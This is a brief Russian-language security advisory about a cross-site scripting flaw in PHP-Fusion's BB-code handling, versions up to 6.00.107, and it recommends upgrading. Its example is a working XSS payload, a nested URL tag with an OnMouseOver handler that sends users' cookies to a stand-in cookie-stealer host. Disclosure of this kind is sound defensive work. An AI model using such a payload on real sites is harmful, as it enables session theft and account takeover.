Программа: PHP-Fusion <=v6.00.107
Описание:
Межсайтовый скриптинг в BB-кодах, который позволяет украсть cookie-файлы пользователей.
Пример:
[URL=http://aaaaaa.com/UR[url=aa.com&&
OnMouseOver=jscript:location='http://direct/to/cookie/stealer.com/?c='+cookie; location="http://google.com]][/URL][/url]
Решение:
Поставьте последнюю версию программы.
